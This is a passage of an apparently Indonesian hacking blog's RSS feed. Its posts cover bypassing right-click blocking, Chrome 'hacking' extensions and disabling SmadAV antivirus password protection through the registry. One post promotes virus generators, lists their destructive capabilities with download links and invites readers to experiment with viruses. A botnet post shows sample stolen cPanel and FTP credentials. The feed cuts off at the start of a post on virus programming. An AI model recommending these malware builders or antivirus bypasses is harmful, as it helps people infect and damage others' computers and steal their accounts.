 yang mencegah klik kanan dengan  menggunakan sebuah addons mozilla 
firefox, nama program tersebut adalah  RightToClick, silahkan &lt;a title=&quot;Download&quot; href=&quot;http://adf.ly/313683/https://addons.mozilla.org/en-US/firefox/search/?lver=5.*&amp;amp;q=RightToClick&amp;amp;y=25&amp;amp;x=29&amp;amp;cat=all&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Download Disini&lt;/strong&gt;&lt;/a&gt;
 bila keluar pesan tidak dapat klik kanan, centrang kotak stop Klik  
kanan kemudian klik Ok, maka anda bisa menggunakan klik kanan mouse  
sepuasnya&lt;/li&gt;&lt;li&gt;Bisa dilakukan dengan cara “&lt;span style=&quot;color: #0000ff;&quot;&gt;&lt;strong&gt;Mendisable JavaScript&lt;/strong&gt;&lt;/span&gt;“, disemua browser ada fungsi ini. Silakan lakukan eksperimen untuk mencari dimana letak informasi mengenai “&lt;span style=&quot;color: #ff0000;&quot;&gt;Disable JavaScript&lt;/span&gt;“, berikut ulasan penjelasannya:&lt;br&gt;
&lt;h3&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;Disable JavaScript in Internet Explorer (IE)&lt;/span&gt;&lt;em&gt; &lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;1) Buka Internet Explorer (IE)&lt;br&gt;
2) Pada Menu Navigasi Klik: &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Tools&lt;/strong&gt;&lt;/span&gt; – &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Internet Options&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;
3) Pilih Pada: &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Security Tab&lt;/strong&gt;&lt;/span&gt; – &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Custom Level&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;
4) Scroll Down sampai ketemu “&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Active Scripting&lt;/strong&gt;&lt;/span&gt;” dan Klik “&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Disable&lt;/strong&gt;&lt;/span&gt;”&lt;br&gt;
5) Ok.&lt;/p&gt;
&lt;div class=&quot;pic&quot;&gt;&lt;img title=&quot;how-to-disable-javascript-ie&quot; src=&quot;http://tothepc.com/img/2010/02/IE-javascript.png&quot; alt=&quot;&quot; height=&quot;256&quot; width=&quot;450&quot;&gt;&lt;/div&gt;
&lt;h3&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;Disable JavaScript Mozilla Firefox&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;1) Buka Mozilla Firefox&lt;br&gt;
2) Pada Navigasi Menu Klik: &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Tools&lt;/strong&gt;&lt;/span&gt; – &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Options&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;
3) Kemudian Klik: &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Content&lt;/strong&gt;&lt;/span&gt; tab, &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Un-check&lt;/strong&gt;&lt;/span&gt; “&lt;strong&gt;Enable JavaScript&lt;/strong&gt;”&lt;br&gt;
4) Ok&lt;/p&gt;
&lt;div class=&quot;pic&quot;&gt;&lt;img title=&quot;how-to-disable-javascript-firefox&quot; src=&quot;http://support.mozilla.com/media/uploads/gallery/images/668a9022f052f20f795759846994bc3f-1260050698-426-1.png&quot; alt=&quot;&quot; height=&quot;173&quot; width=&quot;475&quot;&gt;&lt;br&gt;
&lt;img title=&quot;how-to-disable-javascript-firefox&quot; src=&quot;http://support.mozilla.com/media/uploads/gallery/images/668a9022f052f20f795759846994bc3f-1260050698-426-2.png&quot; alt=&quot;&quot; height=&quot;215&quot; width=&quot;282&quot;&gt;&lt;/div&gt;
&lt;h3&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;Disable JavaScript Google Chrome&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;1) Pada &lt;strong&gt;Google Chrome Shortcut&lt;/strong&gt;, &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Klik Kanan&lt;/strong&gt;&lt;/span&gt; -&amp;gt; Pilih &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Properties&lt;/strong&gt;&lt;/span&gt;.&lt;br&gt;
2) Pada field textbox “&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Targeted file&lt;/strong&gt;&lt;/span&gt;“, tambahkan “&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;-disable-java&lt;/strong&gt;&lt;/span&gt;” pada bagian belakang.&lt;/p&gt;
&lt;div class=&quot;wp_syntax&quot;&gt;
&lt;div class=&quot;code&quot;&gt;
&lt;pre class=&quot;bash&quot; style=&quot;font-family: monospace;&quot;&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;&quot;C:\Documents and Settings\Administrator.SNAKE\Local Settings\Application Data&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\
&lt;/span&gt;Google\Chrome\Application\chrome.exe&quot;&lt;/span&gt; &lt;span style=&quot;color: #660033;&quot;&gt;-disable-javascript&lt;/span&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;pic&quot;&gt;&lt;img title=&quot;how-to-disable-javascript-chrome&quot; src=&quot;http://tothepc.com/img/2010/02/chrome-javascript.png&quot; alt=&quot;&quot; height=&quot;312&quot; width=&quot;455&quot;&gt;&lt;/div&gt;
&lt;/li&gt;&lt;/ol&gt;
&lt;p&gt;&lt;span style=&quot;color: #ff00ff;&quot;&gt;&lt;strong&gt;Jadi sebenarnya &lt;span style=&quot;color: #ff0000;&quot;&gt;percuma&lt;/span&gt; saja kan fasilitas tersebut dipasang di website&lt;/strong&gt;&lt;/span&gt; &lt;img src=&quot;http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif&quot; alt=&quot;:)&quot; class=&quot;wp-smiley&quot;&gt; &lt;/p&gt;</description>
            <pubDate>Sun, 21 Aug 2011 02:00:38 +0100</pubDate>
        </item>
        <item>
            <title>Google Chrome Sebagai Mesin Hacking</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/google-chrome-sebagai-mesin-hacking</link>
            <description>&lt;p&gt;Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai 
bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “&lt;strong&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;KromCAT -&amp;nbsp;Google Chrome Catalog of Auditing exTensions&lt;/span&gt;“.&lt;/strong&gt; Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.&lt;/p&gt;
&lt;p&gt;Mungkin bagi fans google chrome sudah terbiasa memakai tool yang include didalamya yaitu “&lt;span style=&quot;color: #0000ff;&quot;&gt;&lt;strong&gt;Inspect Element, Resources, Script, Dsb&lt;/strong&gt;&lt;/span&gt;“.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;aligncenter&quot; title=&quot;Google Inspect Resource Element&quot; src=&quot;http://code.google.com/chrome/extensions/images/tut_analytics/screenshot04.png&quot; alt=&quot;&quot; height=&quot;367&quot; width=&quot;600&quot;&gt;&lt;/p&gt;
&lt;p&gt;Silakan ditonton&amp;nbsp; implementasinya pada video berikut:&lt;/p&gt;

&lt;p&gt;Namun untuk menjadikan &lt;a href=&quot;http://www.binushacker.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&lt;strong&gt;Google Chrome Sebagai Mesin Hacking&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt; yang handal, kita membutuhkan beberapa tools yang mendukung. Dimana saya menggunakan hal ini untuk melakukan audit site&lt;a href=&quot;http://www.binushacker.net/&quot; target=&quot;_blank&quot;&gt;.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Nah, berikut adalah roadmap catalog dan plugin yang bisa digunakan 
agar google chrome menjadi browser yang powerfull untuk aktifitas 
hacking. Ada beberapa tool didalamnya mengenai “&lt;span style=&quot;color: #0000ff;&quot;&gt;&lt;strong&gt;Information
 Gathering Tools, Application Assessment, Editors, Network Utilities, 
Miscellaneous, Proxies And Web Utilities, IT Security Related&lt;/strong&gt;&lt;/span&gt;“.&amp;nbsp; Silakan dilihat detailnya digambar berikut:&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://www.binushacker.net/wp-content/uploads/KromCAT.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://www.binushacker.net/wp-content/uploads/KromCAT.jpg&quot; alt=&quot;KromCat Catalog&quot; height=&quot;625&quot; width=&quot;600&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;span style=&quot;color: #0000ff;&quot;&gt;roadmap presented by &lt;span style=&quot;color: #ff6600;&quot;&gt;vulnerabilitydatabase&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Jika ingin melakukan aktifitas penetration testing atau audit untuk 
website / target. Sebaiknya siapkan peralatan di atas untuk menunjang 
keberhasilan aktifitas yang dilakukan.&lt;/p&gt;
&lt;p&gt;Semoga informasi ini bermanfaat buat anda semua.&lt;/p&gt;</description>
            <pubDate>Sun, 21 Aug 2011 01:57:37 +0100</pubDate>
        </item>
        <item>
            <title>Hacking Lost Password SmadAV</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/hacking-lost-password-smadav</link>
            <description>&lt;p&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Cara Hack Password Smadav&lt;/strong&gt;&lt;/span&gt; ini sangat berguna bilamana anda &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Lupa Password Smadav&lt;/strong&gt;&lt;/span&gt;
 anda. Sehingga anda tidak dapat menggunakan tool dan menyeting Smadav. 
 Fitur password protect ini hanya ada pada Smadav Pro. Seperti yang kita
  ketahui, fitur ini berfungsi agar tidak sembarang orang dapat  
mengubah-ubah settingan dan menggunakan tool Smadav. Jadi hanya Si Admin
  saja yang bisa mengotak-atik settingannya. Namun bagaiman bila si 
Admin  lupa passwordnya? Nah,berikut mari kita ulas step by step.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;
&lt;strong&gt;Berikut caranya :&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;&lt;li&gt;Ketika anda mendapati bahwasanya anda lupa password Admin Smadav, tutup saja Smadavnya. Lalu buka &lt;strong&gt;Registry Editor&lt;/strong&gt; &lt;em&gt;(Start – Run – ketik “regedit” – Enter)&lt;/em&gt; dan buka key &lt;strong&gt;HKEY_CURRENT_USER\Software\SMADAV&lt;/strong&gt;. (huruf “A” yang didepan “D” itu seharusnya segitiga, bukan “A”. Tapi karena itu karakter ascii jadinya tidak muncul)&lt;/li&gt;&lt;li&gt;Cari string &lt;strong&gt;UsePassword&lt;/strong&gt;, klik 2 kali dan ganti value yang semula 1 menjadi 0.&lt;br&gt;
&lt;img class=&quot;aligncenter&quot; src=&quot;http://1.bp.blogspot.com/-l6nP1tIbdWA/Tgm9s0FgAFI/AAAAAAAAAIo/29Z4_kIbM8A/s400/hack-password-smadav.JPG&quot; alt=&quot;Cara Hack password Smadav&quot; border=&quot;0&quot; height=&quot;311&quot; width=&quot;451&quot;&gt;&lt;br&gt;
&lt;img class=&quot;aligncenter&quot; src=&quot;http://3.bp.blogspot.com/-3NtMq8IV420/Tgm-Aa7nmlI/AAAAAAAAAIs/m-eKWdWv3dM/s1600/hack-smadav.JPG&quot; alt=&quot;Cara Hack password Smadav&quot; border=&quot;0&quot;&gt;&lt;/li&gt;&lt;li&gt;Sekarang itu buka kembali Smadav-nya, anda tidak akan dimintai password. &lt;img src=&quot;http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif&quot; alt=&quot;:)&quot; class=&quot;wp-smiley&quot;&gt; &lt;/li&gt;&lt;li&gt;Lalu buka menu &lt;strong&gt;Setting&lt;/strong&gt;, centang pada opsi “&lt;em&gt;Gunakan password untuk admin Smadav&lt;/em&gt;” dan klik &lt;em&gt;Edit password&lt;/em&gt; un&lt;a href=&quot;http://www.binushacker.net/&quot; target=&quot;_blank&quot;&gt;t&lt;/a&gt;uk mengganti passwordnya dengan yang baru.&lt;br&gt;
&lt;img class=&quot;aligncenter&quot; src=&quot;http://3.bp.blogspot.com/-gcxZCedU8n4/Tgm9VYbd4yI/AAAAAAAAAIk/ma1aWyksxVc/s320/cara-hack-password-smadav.JPG&quot; alt=&quot;Cara Hack password Smadav&quot; border=&quot;0&quot; height=&quot;307&quot; width=&quot;320&quot;&gt;&lt;/li&gt;&lt;li&gt;Masukkan password anda yang baru dan klik &lt;em&gt;Save&lt;/em&gt;. Sekarang passwordnya sudah berhasil diganti. &lt;img src=&quot;http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif&quot; alt=&quot;:)&quot; class=&quot;wp-smiley&quot;&gt;&lt;br&gt;
&lt;img class=&quot;aligncenter&quot; src=&quot;http://2.bp.blogspot.com/-wpEBipsnwpA/Tgm-QGJYgKI/AAAAAAAAAIw/QQBv4jxWHRU/s1600/cara-hack-smadav.JPG&quot; alt=&quot;Cara Hack password Smadav&quot; border=&quot;0&quot;&gt;&lt;/li&gt;&lt;/ol&gt;
Nah, sekarang coba anda otak-atik registry software lainnya.  Barangkali menemukan sesuatu yang un&lt;a href=&quot;http://www.binushacker.net/&quot; target=&quot;_blank&quot;&gt;i&lt;/a&gt;k. &lt;img src=&quot;http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif&quot; alt=&quot;:)&quot; class=&quot;wp-smiley&quot;&gt;</description>
            <pubDate>Sun, 21 Aug 2011 01:53:31 +0100</pubDate>
        </item>
        <item>
            <title>Membuat Virus Dengan Virus Generator</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/membuat-virus-dengan-virus-generator</link>
            <description>&lt;p&gt;Mungkin anda berfikir membuat Virus sangat sulit sekali. Membutuhkan 
 keahlian coding atau paling tidak menguasai salah satu bahasa  
pemrograman windows populer seperti VB atau C++. Namun tidak demikian  
jika anda memiliki Virus Generator. Dengan Virus Generator, pembuatan  
virus dapat dilakukan secepat membuat mie instan. Tinggal klik dan klik,
  maka sebuah virus dengan mudahnya tercipta.&lt;/p&gt;
&lt;p&gt;Virus  generator banyak tersebar di dengan beragam pilihan. Anda bisa
  mencarinya di forum-forum atau situs bawah tanah. Meskipun virus yang 
 diciptakan dapat dibuah dengan mudah, namun anda tidak bisa meremehkan 
 ketangguhanya. Beberapa virus terkenal di yang banyak menyebar di  
Indonesia atau di dunia banyak yang dibuat dengan virus generator ini.&lt;/p&gt;
&lt;p&gt;Berikut beberapa virus generator yang cukup populer yang dapat anda coba untuk membuat virus dengan mudah:&lt;/p&gt;
&lt;p&gt;1. In Shadow Batch Virus Generator&lt;/p&gt;
&lt;p&gt;&lt;br&gt;
Kemampuan:&lt;br&gt;
- Menginfeksi beragam ekstensi file populer&lt;br&gt;
- Mengaktifkan virus ketika start up&lt;br&gt;
- Mematikan berbagai proses dan service penting&lt;br&gt;
- Mengganti ekstensi file dan menyebarkanya melalui file sharing&lt;br&gt;
- Membuat account administrator baru, mengganti password administrator.&lt;br&gt;
- Mematikan komputer otomatis, mendownload files otomatis, dll&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;&quot; href=&quot;http://adf.ly/313683/http://www.mediafire.com/?d0ykxqmmztt&quot;&gt;Download In Shadow Batch Virus Generator&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;2. JPS Virus Maker&lt;/p&gt;
&lt;p&gt;&lt;br&gt;
Kemampuan:&lt;br&gt;
- Mematikan regedit, task manager, MS Config dan beragam aplikasi yang membahayakan kelangsungan hidup virus.&lt;br&gt;
- Menonaktifkan anti virus, wordpad, notepad, command prompt, dll&lt;br&gt;
- Menghiden drive, file, dan tombol-tombol penting seperti Shutdown, restart, logoff, dll&lt;br&gt;
- Mematikan monitor, memainkan mouser, membuka CD drive, dll&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;&quot; href=&quot;http://adf.ly/313683/http://www.mediafire.com/?myiojmfw2vz&quot;&gt;Download JPS Virus Maker&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;3. TeraBIT Virus Maker&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;&quot; href=&quot;http://1.bp.blogspot.com/_vzHp3fW2PNc/S3jbacBN8kI/AAAAAAAABpQ/aJXu9plKBm0/s1600-h/terabit.png&quot;&gt;&lt;img class=&quot;yui-img&quot; id=&quot;BLOGGER_PHOTO_ID_5438337797294256706&quot; src=&quot;http://1.bp.blogspot.com/_vzHp3fW2PNc/S3jbacBN8kI/AAAAAAAABpQ/aJXu9plKBm0/s320/terabit.png&quot; alt=&quot;&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;br&gt;
Kemampuan:&lt;br&gt;
Memiliki beragam kemampuan seperti dua virus generator di atas.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;&quot; href=&quot;http://adf.ly/313683/http://rapidshare.com/files/335607604/TeraBIT_Virus_Maker_3.1.zip&quot;&gt;Download TeraBIT Virus Maker&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Source: http://idecapung[dot]blogspot[dot]com&lt;/p&gt;
&lt;h3&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Other Powerfull &amp;amp; Simple Tools For Virus Generator:&lt;/strong&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div&gt;&lt;strong&gt;Virus Factory 1.0.0 [By LittleSpy]&lt;/strong&gt;&lt;br&gt;
Batch Virus Generator&lt;br&gt;
FUD Drive-By Generator&lt;br&gt;
Icon Changer &amp;amp; File Pumper&lt;/div&gt;

&lt;p&gt;Introduction:&lt;br&gt;
Hey skidforums guys i am proud to present you my newest project Virus Factory !&lt;br&gt;
I coded this yesterday,and i hope you won’t disappoint me by saying that it sucks and something like that!&lt;br&gt;
It is coded in VB.NET and the source is 100 % my job ! Do not say that the source is stolen !&lt;br&gt;
For the other codes check in credits &lt;img src=&quot;http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif&quot; alt=&quot;:)&quot; class=&quot;wp-smiley yui-img&quot;&gt;&lt;br&gt;
Hope you’ll like it !&lt;br&gt;
Watch the video please to see all the features,because i didn’t mentioned them all.&lt;br&gt;
Please scan it only on scanner2.novirusthanks.org with the Do not distribute button checked.&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;Download Link:&lt;/strong&gt;&lt;/span&gt; &lt;a class=&quot;&quot; href=&quot;http://adf.ly/313683/http://www.multiupload.com/0AU042X9E0&quot;&gt;Virus Factory 1.0.0 [By LittleSpy]&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Selamat mencoba &amp;amp; selamat ber-eksperimen dengan virus..&lt;/p&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;sumber: http://www.binushacker.net/membuat-virus-dengan-virus-generator.html&lt;br&gt;&lt;/p&gt;</description>
            <pubDate>Thu, 07 Jul 2011 05:36:39 +0100</pubDate>
        </item>
        <item>
            <title>Dangerous – BotNet</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/dangerous-–-botnet</link>
            <description>&lt;p&gt;Pastinya semua sudah tau apa itu BotNet! Klo belum tau ni gw kasi clue dah..&lt;br&gt;
BotNet merupakan sebuah zombie penggerak system yang bisa digunakan untuk keperluan DDOS, Logging, Recover, dsb.&lt;/p&gt;
&lt;p&gt;Dan untuk saat ini, BinusHacker Team mencoba dan meneliti beberapa 
project BotNet yang bisa sangat berbahaya. BotNet terdiri dari masing² 
platform yang harus secompatible mungkin untuk bisa berjalan dengan baik
 pada masing² OS. Misalkan untuk Windows dan Unix* yang sekarang banyak 
digunakan.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 130%;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;BotNet Trojan&lt;br&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 130%;&quot;&gt;&lt;img class=&quot;size-full wp-image-169 aligncenter yui-img&quot; title=&quot;working-of-trojan&quot; src=&quot;http://blog.kievukraine.info/uploaded_images/6455-746628.jpg&quot; alt=&quot;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Kalau sebuah system sudah terkena BotNet Trojan, maka komputer 
tersebut akan mengirimkan beberapa Informasi log dari system. Dimana 
kita juga bisa mengontrol komputer target. Apabila dalam sebuah Windows 
Server maka kita bisa menggunakan Remote Desktop untuk bisa 
mengaksesnya. Dan apabila pada unix maka kita bisa mengambil logging 
password root. Kemudian kita bisa menggunakan remote login dari hak 
akses root.&lt;/p&gt;
&lt;p&gt;BotNet biasanya dibangun menggunakan MBR (master boot record). Sebuah
 rootkit yang dilaksanakan pada waktu boot, sebelum sistem operasi 
dibuka. Setelah mesin terinfeksi, maka hasil panen malware dan upload 
data dalam 20 menit akan dikirimkan. Data yang dicuri termasuk e-mail 
account, Windows / Unix password, dan FTP credentials POP / SMTP 
account, Control Panel, dll.&lt;/p&gt;
&lt;p&gt;Adapun contoh hasil dari traced pengiriman email dari BotNet:&lt;/p&gt;
&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 130%;&quot;&gt;&lt;img class=&quot;size-full wp-image-169 aligncenter yui-img&quot; title=&quot;working-of-trojan&quot; src=&quot;http://i.zdnet.com/blogs/active_email_harvesters_projecthoneypot.jpg&quot; alt=&quot;&quot; width=&quot;469&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/h1&gt;
&lt;p style=&quot;text-align: center;&quot;&gt;
&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Hasil dari informasi akan diterima dan 
direport dalam Computer Server Attacker, sehingga Informasi yang masuk 
bisa disimpan dan dimanipulasi.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;
&lt;/p&gt;&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 130%;&quot;&gt;&lt;img class=&quot;size-full wp-image-169 aligncenter yui-img&quot; title=&quot;working-of-trojan&quot; src=&quot;http://threatpost.com/sites/default/files/blog_content/image/torpig_data.png&quot; alt=&quot;&quot; width=&quot;469&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/h1&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;Bagaimana hal tersebut bisa terjadi, buat 
semua orang berhati hatilah karena saat ini begitu banyak cara untuk 
mendapatkan Informasi. Dan yang paling berbahaya apabila ada Account 
Privacy anda ada didalam sana. Misalkan Paypal, LR, Atau Bank Account 
Yang ada di Email Anda. Sungguh sangat berbahaya!&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;Berikut ini hanyalah contoh sebuah email 
account yg bisa kita ambil, dimana disana kita bisa backdoor, recover 
password dan sebagainya, bisa anda bayangkan sendiri:&lt;/p&gt;
&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-size: 130%;&quot;&gt;&lt;img class=&quot;size-full wp-image-169 aligncenter yui-img&quot; title=&quot;working-of-trojan&quot; src=&quot;http://www.gnucitizen.org/static/blog/2007/09/ggeht-seq1.jpg&quot; alt=&quot;&quot; width=&quot;469&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/h1&gt;
&lt;p style=&quot;text-align: center;&quot;&gt;
&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Contoh Control Panel Information sebuah website yang bisa didapat:&lt;/p&gt;
&lt;pre&gt;              	Cpanel Username:        fh_609986
              	Cpanel Password:        loft1234
              	FTP Server :            &lt;span class=&quot;linkification-ext&quot;&gt;ftp.***host.org&lt;/span&gt;
              	FTP Login :             fh_609986
              	FTP Password :          loft1234
              	MySQL Database Name:    MUST CREATE IN CPANEL
              	MySQL Username :        fh_609986
              	MySQL Password :        loft1234
              	MySQL Server:           SEE THE CPANEL

              	POP3 Server : mail.***host.org

              	POP3 Username : fh_609986&lt;/pre&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;Contoh FTP Account yang diterima dari BotNet Zombie sebagai berikut:&lt;/p&gt;
&lt;pre&gt;FTP Server: 	***.**host.com
FTP Login: 	***.**host.com
FTP Password: 	l1nuxus3r
E-mail Account Information:
E-mail accounts that you add:
POP3/IMAP Host Address: (depends on hostname you use for
the e-mail account, i.e your domain or subdomain).
SMTP Host Address: (check if you have this option enabled)&lt;/pre&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;Berikut logging aktifitas dalam system ketika DDOS berjalan:&lt;/p&gt;
&lt;pre&gt;A frequent visitor sent me the following table:
     Port  Protocol    Keyword                  D e s c r i p t i o n
     1     tcp         tcpmux                   TCP Port Multiplexer
     1     udp         SocketsdesTroie          [trojan] Sockets Troie
     1     udp         tcpmux                   TCP Port Multiplexer
     2     tcp         compressnet              Management Utility
     2     tcp         Death                    [trojan] Death
     2     udp         compressnet              Management Utility
     3     tcp         compressnet              Compression Process
     3     udp         compressnet              Compression Process
     5     tcp         rje                      Remote Job Entry
     5     udp         rje                      Remote Job Entry
     7     tcp         echo                     Echo
     9     tcp         discard                  Discard
    11     tcp         systat                   Active Users
    11     udp         systat                   Active Users
    13     tcp         daytime                  Daytime
    13     udp         daytime                  Daytime
    15     tcp         netstat                  Netstat
    15     tcp         B2                       [trojan] B2
    17     tcp         qo                       TDQuote of the Day
    17     udp         qo                       TDQuote of the Day
    18     tcp         msp                      Message Send Protocol
    18     udp         msp                      Message Send Protocol
    19     tcp         chargen                  Character Generator
    19     udp         chargen                  Character Generator
    20     tcp         ftp-data                 File Transfer
    20     udp         ftp-data                 File Transfer
    20     tcp         SennaSpyFTPserver        [trojan] Senna Spy FTP
    21     tcp         ftp                      File Transfer [Control]
    21     udp         ftp                      File Transfer [Control]
    21     tcp         BackConstruction         [trojan] Back Construction
    21     tcp         BladeRunner              [trojan] BladeRunner
    21     tcp         CCInvader                [trojan] CC Invader
    21     tcp         DarkFTP                  [trojan] Dark FTP
    21     tcp         DolyTrojan               [trojan] Doly Trojan
    21     tcp         Fore                     [trojan] Fore
    21     tcp         InvisibleFTP             [trojan] Invisible FTP
    21     tcp         Juggernaut42             [trojan] Juggernaut 42
    21     tcp         Larva                    [trojan] Larva
    21     tcp         MotIvFTP                 [trojan] MotIv FTP
    21     tcp         NetAdministrator         [trojan] Net Administrator&lt;/pre&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;
&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;Yang Paling Berbahaya,&lt;/span&gt; &lt;/span&gt;Informasi &lt;span style=&quot;color: #000000;&quot;&gt;&lt;span&gt;Yang Diperoleh Dari BotNet&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;
 adalah terdapat dan bisa di extractnya 1660 unit kartu kredit dan kartu
 debit dari kumpulan data yang diterima. Geolocation melalui alamat IP, 
dipastikan bahwa 49% dari nomor kartu berasal dari korban di AS, 12% 
dari Italia, dan 8% dari Spanyol, dengan 40 negara-negara lain. Yang 
paling umum termasuk kartu Visa (1056), MasterCard (447), American 
Express (81), Maestro (36), dan yang lainnya termasuk Bank Account, dsb 
(24). Yang menarik disana adalah bahwa 80% dari kartu kredit tersebut 
adalah kartu yang terdapat dalam database yang biasanya digunakan untuk 
processing online order.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;Jadi jika anda memiliki komputer dan 
berselancar di internet, berhati²lah dengan spyware, malware, dan BotNet
 zombie yang sangat berbahaya bagi Privacy Anda terutama menyangkut Data
 diri, Email, Login, Password, Username, dsb. Sebaiknya anda melakukan 
check log + memperhatikan proses yang sedang berjalan pada komputer 
Anda. Jika ada yang mencurigakan segera beri tindakan. Jika anda sudah 
mendapatkankan info ini, diharapkan anda bisa share ke yang lainnya dan 
anda bisa menghindari resiko yang akan timbul.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;===================[ EOF ]=====================&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;
sumber: http://www.binushacker.net/dangerous-botnet.html&lt;br&gt;&lt;/p&gt;</description>
            <pubDate>Thu, 07 Jul 2011 05:32:33 +0100</pubDate>
        </item>
        <item>
            <title>Pemrograman Virus Komputer</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/pemrograman-virus-komputer</link>
            <description>&lt;strong&gt;&lt;p align=&quot;center&quot;&gt;&lt;span style=&quot;color: #000099;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;
&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;4. 1. Cara Kerja Virus Komputer&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
